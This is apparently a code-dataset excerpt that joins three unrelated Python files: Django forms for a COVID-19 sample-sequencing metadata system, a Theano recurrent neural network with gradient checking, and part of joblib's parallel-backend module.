css_class="form-row",
)
),
Fieldset("Organisation",
Row(
Column('organisation', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("SSH Key",
'ssh_key'
),
FormActions(
Submit('save', 'Register'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
if cleaned_data.get("password1") != cleaned_data.get("password2"):
self.add_error("password1", "Passwords do not match.")
self.add_error("password2", "Passwords do not match.")
if User.objects.filter(username=generate_username(cleaned_data)).count() > 0:
#raise forms.ValidationError('This username has already been registered. You may be in the approval queue.')
self.add_error("username", 'This username has already been registered. You may be in the approval queue.')
def clean_ssh_key(self):
return majora_clean_ssh_key(self.cleaned_data.get("ssh_key"))
class M2Metric_SequenceForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Sequence
exclude = []
class M2Metric_MappingForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Mapping
exclude = []
class M2Metric_MappingTileForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Mapping_Tiles
exclude = []
class M2Metric_ThresholdCycleForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_ThresholdCycle
exclude = []
class M2MetricRecord_ThresholdCycleForm(forms.Form): # should probably be a modelform, but w/e
artifact_metric = forms.ModelChoiceField(queryset=models.TemporaryMajoraArtifactMetric_ThresholdCycle.objects.all(), required=True)
ct_value = forms.FloatField(required=True, min_value=0.0)
test_kit = forms.ChoiceField(
choices=[
(None, ""),
("ALTONA", "ALTONA"),
("ABBOTT", "ABBOTT"),
("ROCHE", "ROCHE"),
("AUSDIAGNOSTICS", "AUSDIAGNOSTICS"),
("BOSPHORE", "BOSPHORE"),
("INHOUSE", "INHOUSE"),
("SEEGENE", "SEEGENE"),
("VIASURE", "VIASURE"),
("BD", "BD"),
("XPERT", "XPERT"),
],
required=False,
)
test_platform = forms.ChoiceField(
choices=[
(None, ""),
("ALTOSTAR_AM16", "ALTOSTAR_AM16"),
("ABBOTT_M2000", "ABBOTT_M2000"),
("APPLIED_BIO_7500", "APPLIED_BIO_7500"),
("ROCHE_FLOW", "ROCHE_FLOW"),
("ROCHE_COBAS", "ROCHE_COBAS"),
("ELITE_INGENIUS", "ELITE_INGENIUS"),
("CEPHEID_XPERT", "CEPHEID_XPERT"),
("QIASTAT_DX", "QIASTAT_DX"),
("AUSDIAGNOSTICS", "AUSDIAGNOSTICS"),
("ROCHE_LIGHTCYCLER", "ROCHE_LIGHTCYCLER"),
("INHOUSE", "INHOUSE"),
("ALTONA", "ALTONA"),
("PANTHER", "PANTHER"),
("SEEGENE_NIMBUS", "SEEGENE_NIMBUS"),
("QIAGEN_ROTORGENE", "QIAGEN_ROTORGENE"),
("BD_MAX", "BD_MAX"),
],
required=False,
)
test_target = forms.ChoiceField(
choices=[
(None, ""),
("S", "S"),
("E", "E"),
("N", "N"),
("RDRP","RDRP"),
("ORF1AB", "ORF1AB"),
("ORF8", "ORF8"),
("RDRP+N", "RDRP+N"),
],
required=False,
)
class TestMetadataForm(forms.Form):
artifact = forms.ModelChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
group = forms.ModelChoiceField(queryset=models.MajoraArtifactGroup.objects.all(), required=False, to_field_name="dice_name")
process = forms.ModelChoiceField(queryset=models.MajoraArtifactProcess.objects.all(), required=False)
#pgroup
tag = forms.CharField(max_length=64)
name = forms.CharField(max_length=64)
value = forms.CharField(max_length=128)
timestamp = forms.DateTimeField()
def clean(self):
cleaned_data = super().clean()
if not (cleaned_data.get("artifact") or cleaned_data.get("group") or cleaned_data.get("process")):
msg = "You must provide one 'artifact', 'group' or 'process' to attach metadata to"
self.add_error("artifact", msg)
self.add_error("group", msg)
self.add_error("process", msg)
class TestLibraryForm(forms.Form):
library_name = forms.CharField(max_length=48, min_length=5)
library_layout_config = forms.ChoiceField(
choices=[
(None, ""),
("SINGLE", "SINGLE"),
("PAIRED", "PAIRED"),
],
)
library_layout_read_length = forms.IntegerField(min_value=0, required=False)
library_layout_insert_length = forms.IntegerField(min_value=0, required=False)
library_seq_kit = forms.CharField(max_length=48)
library_seq_protocol = forms.CharField(max_length=48)
class TestLibraryBiosampleForm(forms.Form):
central_sample_id = forms.ModelChoiceField(queryset=models.BiosampleArtifact.objects.all(), required=True, to_field_name="dice_name")
library_name = forms.ModelChoiceField(queryset=models.LibraryArtifact.objects.all(), required=True, to_field_name="dice_name")
barcode = forms.CharField(max_length=24, required=False)
library_strategy = forms.ChoiceField(
choices=[
(None, ""),
("WGS", "WGS: Whole Genome Sequencing"),
("WGA", "WGA: Whole Genome Amplification"),
("AMPLICON", "AMPLICON: Sequencing of overlapping or distinct PCR or RT-PCR products"),
("TARGETED_CAPTURE", "TARGETED_CAPTURE: Enrichment of a targeted subset of loci"),
("OTHER", "?: Library strategy not listed"),
],
)
library_source = forms.ChoiceField(
choices=[
(None, ""),
("GENOMIC", "GENOMIC"),
("TRANSCRIPTOMIC", "TRANSCRIPTOMIC"),
("METAGENOMIC", "METAGENOMIC"),
("METATRANSCRIPTOMIC", "METATRANSCRIPTOMIC"),
("VIRAL_RNA", "VIRAL RNA"),
("OTHER", "?: Other, unspecified, or unknown library source material"),
],
)
library_selection = forms.ChoiceField(
choices=[
(None, ""),
("RANDOM", "RANDOM: No Selection or Random selection"),
("PCR", "PCR: Enrichment via PCR"),
("RANDOM_PCR", "RANDOM-PCR: Source material was selected by randomly generated primers"),
("OTHER", "?: Other library enrichment, screening, or selection process"),
],
)
library_primers = forms.CharField(max_length=48, required=False)
library_protocol = forms.CharField(max_length=48, required=False)
class TestSequencingForm(forms.Form):
library_name = forms.ModelChoiceField(queryset=models.LibraryArtifact.objects.all(), required=True, to_field_name="dice_name")
sequencing_id = forms.UUIDField(required=False)
run_name = forms.CharField(max_length=128, required=False, min_length=5)
run_group = forms.CharField(max_length=128, required=False)
instrument_make = forms.ChoiceField(
label="Instrument Make",
choices=[
(None, ""),
("ILLUMINA", "Illumina"),
("OXFORD_NANOPORE", "Oxford Nanopore"),
("PACIFIC_BIOSCIENCES", "Pacific Biosciences"),
],
)
instrument_model = forms.CharField(
label="Instrument Model",
)
flowcell_type = forms.CharField(max_length=48, required=False)
#flowcell_version = forms.CharField(max_length=48)
flowcell_id = forms.CharField(max_length=48, required=False)
start_time = forms.DateTimeField(input_formats=["%Y-%m-%d %H:%M"], required=False)
end_time = forms.DateTimeField(input_formats=["%Y-%m-%d %H:%M"], required=False)
@staticmethod
def modify_preform(data):
UPPERCASE_FIELDS = [
"instrument_make",
]
for field in UPPERCASE_FIELDS:
if data.get(field):
data[field] = data[field].upper().strip().replace(' ', '_')
return data
def clean(self):
run_name = self.cleaned_data.get("run_name")
if not self.cleaned_data.get("sequencing_id"):
if not run_name:
self.add_error("run_name", "If you don't provide a sequencing_id, you must provide a run_name")
reserved_ch = [".", "/", "\\"]
for ch in reserved_ch:
if ch in run_name:
self.add_error("run_name", "run_name cannot contain a reserved character: %s" % str(reserved_ch))
break
class TestSampleForm(forms.Form):
biosample_source_id = forms.CharField(
label="Pseudonymous patient identifier", max_length=56,
help_text="Leave blank if not available. <b>DO NOT enter an NHS number here</b>", required=False)
root_sample_id = forms.CharField(
label="Health Agency sample identifier", max_length=56, required=False,
help_text="Leave blank if not applicable or available. It will not be possible to collect private metadata for this sample without this"
)
sender_sample_id = forms.CharField(
label="Local sample identifier", max_length=56, required=False,
help_text="Leave blank if not applicable or available. It will not be possible to collect private metadata for this sample without this"
)
central_sample_id = forms.CharField(
label="New sample identifier", max_length=56, min_length=5,
help_text="Heron barcode assigned by WSI"
)
collection_date = forms.DateField(
label="Collection date",
help_text="YYYY-MM-DD",
required=False,
)
received_date = forms.DateField(
label="Received date",
help_text="YYYY-MM-DD",
required=False,
)
country = forms.CharField(disabled=True)
adm1 = forms.ChoiceField(
label="Region",
choices=[
(None, ""),
("UK-ENG", "England"),
("UK-SCT", "Scotland"),
("UK-WLS", "Wales"),
("UK-NIR", "Northern Ireland"),
],
)
source_age = forms.IntegerField(min_value=0, required=False, help_text="Age in years")
source_sex = forms.ChoiceField(choices=[
(None, ""),
("F", "F"),
("M", "M"),
("Other", "Other"),
], required=False, help_text="Reported sex")
adm2 = forms.CharField(
label="County",
max_length=100,
required=False,
help_text="Enter the COUNTY from the patient's address. Leave blank if this was not available."
)
#adm2 = forms.ModelChoiceField(
# queryset=models.County.objects.all(),
# to_field_name="name",
# label="County",
# required=False,
# help_text="Enter the COUNTY from the patient's address. Leave blank if this was not available."
#)
adm2_private = forms.CharField(
label="Outward postcode",
max_length=10,
required=False,
help_text="Enter the <b>first part</b> of the patients home postcode. Leave blank if this was not available."
)
submitting_user = forms.CharField(disabled=True, required=False)
submitting_org = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("name"), disabled=True, required=False)
collecting_org = forms.CharField(max_length=100, required=False, help_text="The site that this sample was collected by. Use the first line of the 'sender' from the corresponding E28")
source_type = forms.ChoiceField(
choices = [
("human", "human"),
],
disabled = True,
)
source_taxon = forms.CharField(
max_length=24,
disabled=True,
)
sample_type_collected = forms.ChoiceField(
choices= [
(None, "Unknown"),
("dry swab", "dry swab"),
("swab", "swab"),
("aspirate", "aspirate"),
("sputum", "sputum"),
("BAL", "BAL"),
],
required=False,
)
sample_type_received = forms.ChoiceField(
choices= [
(None, "Unknown"),
("primary", "primary"),
("extract", "extract"),
("lysate", "lysate"),
("culture", "culture"),
],
required=False,
)
swab_site = forms.ChoiceField(
choices= [
(None, None),
("nose", "nose"),
("throat", "throat"),
("nose-throat", "nose and throat"),
("endotracheal", "endotracheal"),
("rectal", "rectal"),
],
help_text="Provide only if sample_type_collected is swab",
required=False,
)
#override_heron = forms.BooleanField(
# label="Override Heron validator",
# help_text="Enable this checkbox if your sample has not been assigned a Heron identifier. <i>e.g.</i> The sample has already been submitted to GISAID",
# required=False)
#secondary_identifier = forms.CharField(
# max_length=256,
# label="GISAID identifier string",
# help_text="New COG-UK samples will have GISAID strings automatically composed. If this sample has already been submitted to GISAID, provide the identifier here.",
# required=False)
#secondary_accession = forms.CharField(
# max_length=256,
# label="GISAID accession",
# help_text="If this sample has already been submitted to GISAID, provide the accession here.",
# required=False)
#tube_dice = forms.CharField()
#box_dice = forms.CharField()
#tube_x = forms.IntegerField()
#tube_y = forms.IntegerField()
#current_sample_type = forms.ChoiceField()
#accepted = forms.BooleanField()
#quarantine_reason = forms.ChoiceField()
#received_date =
#TODO Extra COGUK supplemental fields
# In an ideal world where we have more time, we'd pin a bunch of supplemental modelforms but we need this asappppp
is_surveillance = forms.NullBooleanField()
is_hcw = forms.NullBooleanField()
employing_hospital_name = forms.CharField(max_length=100, required=False)
employing_hospital_trust_or_board = forms.CharField(max_length=100, required=False)
is_hospital_patient = forms.NullBooleanField()
is_icu_patient = forms.NullBooleanField()
admission_date = forms.DateField(
label="Received date",
help_text="YYYY-MM-DD",
required=False,
)
admitted_hospital_name = forms.CharField(max_length=100, required=False)
admitted_hospital_trust_or_board = forms.CharField(max_length=100, required=False)
is_care_home_worker = forms.NullBooleanField()
is_care_home_resident = forms.NullBooleanField()
anonymised_care_home_code = forms.CharField(max_length=10, required=False)
admitted_with_covid_diagnosis = forms.NullBooleanField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Identifiers",
Row(
Column('biosample_source_id', css_class="form-group col-md-3 mb-0"),
Column('root_sample_id', css_class="form-group col-md-3 mb-0"),
Column('sender_sample_id', css_class="form-group col-md-3 mb-0"),
Column('central_sample_id', css_class="form-group col-md-3 mb-0"),
css_class="form-row",
)
),
Fieldset("Form",
Row(
Column('source_type', css_class="form-group col-md-3 mb-0"),
Column('source_taxon', css_class="form-group col-md-3 mb-0"),
Column('sample_type_collected', css_class="form-group col-md-2 mb-0"),
Column('swab_site', css_class="form-group col-md-2 mb-0"),
Column('sample_type_received', css_class="form-group col-md-2 mb-0"),
css_class="form-row",
)
),
Fieldset("Locality",
Row(
Column('country', css_class="form-group col-md-3 mb-0"),
Column('adm1', css_class="form-group col-md-2 mb-0"),
Column('adm2', css_class="form-group col-md-4 mb-0"),
Column('adm2_private', css_class="form-group col-md-3 mb-0"),
css_class="form-row",
)
),
Fieldset("Key information",
Row(
Column('collection_date', css_class="form-group col-md-3 mb-0"),
Column('received_date', css_class="form-group col-md-3 mb-0"),
Column('age', css_class="form-group col-md-2 mb-0"),
Column('sex', css_class="form-group col-md-2 mb-0"),
css_class="form-row",
),
),
Fieldset("Collecting and sequencing",
Row(
Column('collecting_org', css_class="form-group col-md-5 mb-0"),
Column('submitting_user', css_class="form-group col-md-3 mb-0"),
Column('submitting_org', css_class="form-group col-md-4 mb-0"),
css_class="form-row",
)
),
Fieldset("Advanced Options",
Row(
Column('secondary_identifier', css_class="form-group col-md-6 mb-0"),
Column('secondary_accession', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
#Row(
# Column('override_heron', css_class="form-group col-md-6 mb-0"),
# css_class="form-row",
#)
),
FormActions(
Submit('save', 'Submit sample'),
css_class="text-right",
)
)
@staticmethod
def modify_preform(data):
LOWERCASE_FIELDS = [
"swab_site",
"sample_type_collected",
"sample_type_received",
]
UPPERCASE_FIELDS = [
]
COERCE_BOOLEAN = [
"is_surveillance",
"is_hcw",
"is_hospital_patient",
"is_care_home_worker",
"is_care_home_resident",
"admitted_with_covid_diagnosis",
"is_icu_patient",
]
for field in LOWERCASE_FIELDS:
if data.get(field):
data[field] = data[field].strip()
if data[field] != "BAL":
data[field] = data[field].strip().lower()
for field in UPPERCASE_FIELDS:
if data.get(field):
data[field] = data[field].strip().upper()
for field in COERCE_BOOLEAN:
if data.get(field):
b = data[field].strip().upper()
if b == "Y" or b == "YES":
data[field] = True
elif b == "N" or b == "NO":
data[field] = False
else:
data[field] = None
#if data.get("swab_site", "").upper() == "NSTS" or data.get("swab_site", "").lower() == "nose and throat":
# data["swab_site"] = "nose-throat"
return data
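    # Example (added): modify_preform({"is_hcw": "yes", "is_icu_patient": "maybe"})
    # returns is_hcw=True and is_icu_patient=None, since only Y/YES and N/NO
    # (case-insensitive) are coerced to booleans; anything else becomes None.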
def clean(self):
cleaned_data = super().clean()
# Check barcode starts with a Heron prefix, unless this has been overridden
#sample_id = cleaned_data.get("central_sample_id")
#if sample_id:
# if cleaned_data["override_heron"] is False:
# valid_sites = [x.code for x in models.Institute.objects.exclude(code__startswith="?")]
# if sum([sample_id.startswith(x) for x in valid_sites]) == 0:
# self.add_error("central_sample_id", "Sample identifier does not match the WSI manifest.")
# Check a received_date was provided for samples without a collection date
if not cleaned_data.get("collection_date") and not cleaned_data.get("received_date"):
self.add_error("received_date", "You must provide a received date for samples without a collection date")
# Check sample date is not in the future
if cleaned_data.get("collection_date"):
if cleaned_data["collection_date"] > timezone.now().date():
self.add_error("collection_date", "Sample cannot be collected in the future")
elif cleaned_data["collection_date"] < (timezone.now().date() - datetime.timedelta(days=365)):
self.add_error("collection_date", "Sample cannot be collected more than a year ago...")
if cleaned_data.get("received_date"):
if cleaned_data["received_date"] > timezone.now().date():
self.add_error("received_date", "Sample cannot be received in the future")
elif cleaned_data["received_date"] < (timezone.now().date() - datetime.timedelta(days=365)):
self.add_error("received_date", "Sample cannot be received more than a year ago...")
# Check if the adm2 looks like a postcode
adm2 = cleaned_data.get("adm2", "")
if len(adm2) > 0 and re.search('\d', adm2):
self.add_error("adm2", "adm2 cannot contain numbers. Use adm2_private if you are trying to provide an outer postcode")
# Check for full postcode mistake
adm2_private = cleaned_data.get("adm2_private")
if " " in adm2_private:
self.add_error("adm2_private", "Enter the first part of the postcode only")
# Validate swab site
swab_site = cleaned_data.get("swab_site")
sample_type = cleaned_data.get("sample_type_collected")
if sample_type and ("swab" not in sample_type and sample_type != "aspirate") and swab_site:
self.add_error("sample_type_collected", "Swab site specified but the sample type is not 'swab'")
#if sample_type == "swab" and not swab_site:
# self.add_error("sample_type_collected", "Sample was a swab but you did not specify the swab site")
# Force is_surveillance
if cleaned_data.get("is_surveillance") is None:
self.add_error("is_surveillance", "You must set is_surveillance to Y or N")
if cleaned_data.get("admission_date") and not cleaned_data.get("is_hospital_patient"):
self.add_error("is_hospital_patient", "Admission date implies patient was admitted to hospital but you've not set is_hospital_patient to Y")
class TestFileForm(forms.Form):
bridge_artifact = forms.ModelChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
source_artifact = forms.ModelMultipleChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
source_group = forms.ModelMultipleChoiceField(queryset=models.MajoraArtifactGroup.objects.all(), required=False, to_field_name="dice_name")
publish_group = forms.CharField(max_length=128, required=False)
#pipe_id = forms.UUIDField()
pipe_hook = forms.CharField(max_length=256)
artifact_uuid = forms.UUIDField(required=False)
pipe_kind = forms.CharField(max_length=64)
pipe_name = forms.CharField(max_length=96)
pipe_version = forms.CharField(max_length=48)
#node_uuid = forms.ModelChoiceField(queryset=models.DigitalResourceNode.objects.all())
node_name = forms.ModelChoiceField(queryset=models.DigitalResourceNode.objects.all(), to_field_name="unique_name", required=False)
path = forms.CharField(max_length=1024)
sep = forms.CharField(max_length=2)
current_name = forms.CharField(max_length=512)
current_fext = forms.CharField(max_length=48)
current_hash = forms.CharField(max_length=64)
current_size = forms.IntegerField(min_value=0)
resource_type = forms.ChoiceField(
choices= [
("file", "file"),
("reads", "reads"),
("alignment", "alignment"),
("consensus", "consensus"),
],
)
| [
"[email protected]"
] | |
6066c82429a06cfc912a197d31d676903f1d208e | cd50ed5464a5397b4e5bafc36efebf88f14b2d8b | /models/rnn_theano.py | cd97581f15b5bc82263db599c4e65f8f297ca657 | [] | no_license | millatidy/hit400_lstm | cc6db62c68f18296e40a75395725a8112d4632e8 | 38bce32bd8bec5c20e373957526bfecf79a3a761 | refs/heads/master | 2021-06-18T01:20:17.006138 | 2017-05-09T01:44:24 | 2017-05-09T01:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,909 | py | import numpy as np
import theano as theano
import theano.tensor as T
from utils import *
import operator
class RNN_THEANO:
'''
    input_dim is the size of the input layer (the vocabulary size)
    hidden_dim is the size of the hidden layer
    output_dim is the size of the output layer
    # input-to-hidden weights IH: array [hidden_dim, input_dim]
    # hidden-to-hidden weights HH: array [hidden_dim, hidden_dim]
    # hidden-to-output weights HO: array [output_dim, hidden_dim]
'''
def __init__(self, input_dim, hidden_dim, output_dim, bptt_truncate=4):
# assign instance variables
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
self.bptt_truncate = bptt_truncate
        # randomly initialize network weights
input_to_hidden_weights = np.random.uniform(-np.sqrt(1./input_dim), np.sqrt(1./input_dim), (hidden_dim, input_dim))
hidden_to_hidden_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))
hidden_to_output_weights = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (output_dim, hidden_dim))
        # Theano: create shared variables
self.IH = theano.shared(name='IH', value=input_to_hidden_weights.astype(theano.config.floatX))
self.HH = theano.shared(name='HH', value=hidden_to_hidden_weights.astype(theano.config.floatX))
self.HO = theano.shared(name='HO', value=hidden_to_output_weights.astype(theano.config.floatX))
        # We store the compiled Theano graph here
self.theano = {}
self.__theano_build__()
def __theano_build__(self):
IH, HH, HO = self.IH, self.HH, self.HO
x = T.ivector('x')
y = T.ivector('y')
def forward_prop_step(x_t, h_t_prev, IH, HH, HO):
h_t = T.tanh(IH[:,x_t] + HH.dot(h_t_prev))
o_t = T.nnet.softmax(HO.dot(h_t))
return [o_t[0], h_t]
[o,h], updates = theano.scan(
forward_prop_step,
sequences=x,
outputs_info=[None, dict(initial=T.zeros(self.hidden_dim))],
non_sequences=[IH, HH, HO],
truncate_gradient=self.bptt_truncate,
strict=True)
prediction = T.argmax(o, axis=1)
o_error = T.sum(T.nnet.categorical_crossentropy(o,y))
# Gradients
dIH = T.grad(o_error, IH)
dHH = T.grad(o_error, HH)
dHO = T.grad(o_error, HO)
# Assign functions
self.forward_propagation = theano.function([x], o)
self.predict = theano.function([x], prediction)
self.ce_error = theano.function([x,y], o_error)
        self.bptt = theano.function([x,y], [dIH, dHH, dHO])
# SGD
learning_rate = T.scalar('learning_rate')
        self.sgd_step = theano.function([x,y,learning_rate], [],
                        updates=[(self.IH, self.IH - learning_rate * dIH),
                        (self.HH, self.HH - learning_rate * dHH),
                        (self.HO, self.HO - learning_rate * dHO)])
def calculate_total_loss(self, X, Y):
return np.sum([self.ce_error(x,y) for x,y in zip(X,Y)])
def calculate_loss(self, X, Y):
# Divide calculate_loss by the number of words
num_words = np.sum([len(y) for y in Y])
return self.calculate_total_loss(X,Y)/float(num_words)
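# --- Illustrative usage sketch (added; not part of the original module) ---
# A minimal training-loop sketch assuming `X_train`/`y_train` are lists of
# word-index vectors; the dimensions and learning rate below are made up.
def example_training_run(X_train, y_train, vocab_size=100):
    model = RNN_THEANO(vocab_size, 16, vocab_size)
    for epoch in range(5):
        for x, y in zip(X_train, y_train):
            model.sgd_step(x, y, 0.005)  # one SGD update per example
    return model.calculate_loss(X_train, y_train)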
def gradient_check_theano(model, x, y, h=0.001, error_threshold=0.01):
# Overwrite the bptt attribute. We need to backpropagate all the way to get the correct gradient
model.bptt_truncate = 1000
# Calculate the gradients using backprop
bptt_gradients = model.bptt(x, y)
    # List of all parameters we want to check.
    model_parameters = ['IH', 'HH', 'HO']
# Gradient check for each parameter
for pidx, pname in enumerate(model_parameters):
        # Get the actual parameter value from the model, e.g. model.HH
parameter_T = operator.attrgetter(pname)(model)
parameter = parameter_T.get_value()
print "Performing gradient check for parameter %s with size %d." % (pname, np.prod(parameter.shape))
# Iterate over each element of the parameter matrix, e.g. (0,0), (0,1), ...
it = np.nditer(parameter, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# Save the original value so we can reset it later
original_value = parameter[ix]
# Estimate the gradient using (f(x+h) - f(x-h))/(2*h)
parameter[ix] = original_value + h
parameter_T.set_value(parameter)
gradplus = model.calculate_total_loss([x],[y])
parameter[ix] = original_value - h
parameter_T.set_value(parameter)
gradminus = model.calculate_total_loss([x],[y])
estimated_gradient = (gradplus - gradminus)/(2*h)
parameter[ix] = original_value
parameter_T.set_value(parameter)
# The gradient for this parameter calculated using backpropagation
backprop_gradient = bptt_gradients[pidx][ix]
            # Calculate the relative error: (|x - y|/(|x| + |y|))
relative_error = np.abs(backprop_gradient - estimated_gradient)/(np.abs(backprop_gradient) + np.abs(estimated_gradient))
            # If the error is too large, fail the gradient check
if relative_error > error_threshold:
print "Gradient Check ERROR: parameter=%s ix=%s" % (pname, ix)
print "+h Loss: %f" % gradplus
print "-h Loss: %f" % gradminus
print "Estimated_gradient: %f" % estimated_gradient
print "Backpropagation gradient: %f" % backprop_gradient
print "Relative Error: %f" % relative_error
return
it.iternext()
print "Gradient check for parameter %s passed." % (pname)
| [
"[email protected]"
] | |
d119951e1a0327b0d9524d4b51562c44cbcf814c | b2c04e31a4eeb4b512512ef6731049fa65f4407c | /presidentspeech/lib/python3.6/site-packages/joblib/_parallel_backends.py | c78750667edb93004442e2a058d88459b9fda75d | [
"MIT"
] | permissive | aless80/Presidentspeech | 805f4da59a9d3e150db752f64f5b9ca0d5b04223 | 39349a4e6fa5a51a181a418bdc85f00878b4c6e4 | refs/heads/master | 2022-11-29T08:52:02.405580 | 2018-10-07T19:45:21 | 2018-10-07T19:45:21 | 102,866,762 | 1 | 0 | MIT | 2022-11-22T03:03:33 | 2017-09-08T13:54:01 | Python | UTF-8 | Python | false | false | 23,014 | py | """
Backends for embarrassingly parallel code.
"""
import gc
import os
import sys
import warnings
import threading
import functools
import contextlib
from abc import ABCMeta, abstractmethod
from .format_stack import format_exc
from .my_exceptions import WorkerInterrupt, TransportableException
from ._multiprocessing_helpers import mp
from ._compat import with_metaclass, PY27
if mp is not None:
from .disk import delete_folder
from .pool import MemmappingPool
from multiprocessing.pool import ThreadPool
from .executor import get_memmapping_executor
# Compat between concurrent.futures and multiprocessing TimeoutError
from multiprocessing import TimeoutError
from .externals.loky._base import TimeoutError as LokyTimeoutError
from .externals.loky import process_executor, cpu_count
class ParallelBackendBase(with_metaclass(ABCMeta)):
"""Helper abc which defines all methods a ParallelBackend must implement"""
supports_timeout = False
nesting_level = 0
def __init__(self, nesting_level=0):
self.nesting_level = nesting_level
SUPPORTED_CLIB_VARS = [
'OMP_NUM_THREADS', 'OPENBLAS_NUM_THREADS', 'MKL_NUM_THREADS',
'VECLIB_MAXIMUM_THREADS', 'NUMEXPR_NUM_THREADS'
]
@abstractmethod
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs that can actually run in parallel
n_jobs is the number of workers requested by the callers. Passing
n_jobs=-1 means requesting all available workers for instance matching
the number of CPU cores on the worker host(s).
This method should return a guesstimate of the number of workers that
can actually perform work concurrently. The primary use case is to make
it possible for the caller to know in how many chunks to slice the
work.
In general working on larger data chunks is more efficient (less
scheduling overhead and better use of CPU cache prefetching heuristics)
as long as all the workers have enough work to do.
"""
@abstractmethod
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
**backend_args):
"""Reconfigure the backend and return the number of workers.
This makes it possible to reuse an existing backend instance for
successive independent calls to Parallel with different parameters.
"""
self.parallel = parallel
return self.effective_n_jobs(n_jobs)
def start_call(self):
"""Call-back method called at the beginning of a Parallel call"""
def stop_call(self):
"""Call-back method called at the end of a Parallel call"""
def terminate(self):
"""Shutdown the workers and free the shared memory."""
def compute_batch_size(self):
"""Determine the optimal batch size"""
return 1
def batch_completed(self, batch_size, duration):
"""Callback indicate how long it took to run a batch"""
def get_exceptions(self):
"""List of exception types to be captured."""
return []
def abort_everything(self, ensure_ready=True):
"""Abort any running tasks
        This is called when an exception has been raised while executing a task,
and all the remaining tasks will be ignored and can therefore be
aborted to spare computation resources.
If ensure_ready is True, the backend should be left in an operating
state as future tasks might be re-submitted via that same backend
instance.
If ensure_ready is False, the implementer of this method can decide
to leave the backend in a closed / terminated state as no new task
are expected to be submitted to this backend.
Setting ensure_ready to False is an optimization that can be leveraged
when aborting tasks via killing processes from a local process pool
managed by the backend it-self: if we expect no new tasks, there is no
point in re-creating new workers.
"""
# Does nothing by default: to be overridden in subclasses when
# canceling tasks is possible.
pass
def get_nested_backend(self):
"""Backend instance to be used by nested Parallel calls.
By default a thread-based backend is used for the first level of
nesting. Beyond, switch to sequential backend to avoid spawning too
many threads on the host.
"""
nesting_level = getattr(self, 'nesting_level', 0) + 1
if nesting_level > 1:
return SequentialBackend(nesting_level=nesting_level)
else:
return ThreadingBackend(nesting_level=nesting_level)
@contextlib.contextmanager
def retrieval_context(self):
"""Context manager to manage an execution context.
Calls to Parallel.retrieve will be made inside this context.
By default, this does nothing. It may be useful for subclasses to
handle nested parallelism. In particular, it may be required to avoid
deadlocks if a backend manages a fixed number of workers, when those
workers may be asked to do nested Parallel calls. Without
'retrieval_context' this could lead to deadlock, as all the workers
managed by the backend may be "busy" waiting for the nested parallel
calls to finish, but the backend has no free workers to execute those
tasks.
"""
yield
@classmethod
def limit_clib_threads(cls, n_threads=1):
"""Initializer to limit the number of threads used by some C-libraries.
        This function sets the number of threads to `n_threads` for OpenMP, MKL,
        Accelerate and OpenBLAS libraries, which can be used with scientific
computing tools like numpy.
"""
for var in cls.SUPPORTED_CLIB_VARS:
var_value = os.environ.get(var, None)
if var_value is None:
os.environ[var] = str(n_threads)
class SequentialBackend(ParallelBackendBase):
"""A ParallelBackend which will execute all batches sequentially.
Does not use/create any threading objects, and hence has minimal
overhead. Used when n_jobs == 1.
"""
uses_threads = True
supports_sharedmem = True
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
return 1
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
result = ImmediateResult(func)
if callback:
callback(result)
return result
def get_nested_backend(self):
nested_level = getattr(self, 'nesting_level', 0) + 1
return SequentialBackend(nesting_level=nested_level)
class PoolManagerMixin(object):
"""A helper class for managing pool of workers."""
_pool = None
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
elif mp is None or n_jobs is None:
# multiprocessing is not available or disabled, fallback
# to sequential mode
return 1
elif n_jobs < 0:
n_jobs = max(cpu_count() + 1 + n_jobs, 1)
return n_jobs
def terminate(self):
"""Shutdown the process or thread pool"""
if self._pool is not None:
self._pool.close()
self._pool.terminate() # terminate does a join()
self._pool = None
def _get_pool(self):
"""Used by apply_async to make it possible to implement lazy init"""
return self._pool
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
return self._get_pool().apply_async(
SafeFunction(func), callback=callback)
def abort_everything(self, ensure_ready=True):
"""Shutdown the pool and restart a new one with the same parameters"""
self.terminate()
if ensure_ready:
self.configure(n_jobs=self.parallel.n_jobs, parallel=self.parallel,
**self.parallel._backend_args)
class AutoBatchingMixin(object):
"""A helper class for automagically batching jobs."""
# In seconds, should be big enough to hide multiprocessing dispatching
# overhead.
# This settings was found by running benchmarks/bench_auto_batching.py
# with various parameters on various platforms.
MIN_IDEAL_BATCH_DURATION = .2
# Should not be too high to avoid stragglers: long jobs running alone
# on a single worker while other workers have no work to process any more.
MAX_IDEAL_BATCH_DURATION = 2
# Batching counters default values
_DEFAULT_EFFECTIVE_BATCH_SIZE = 1
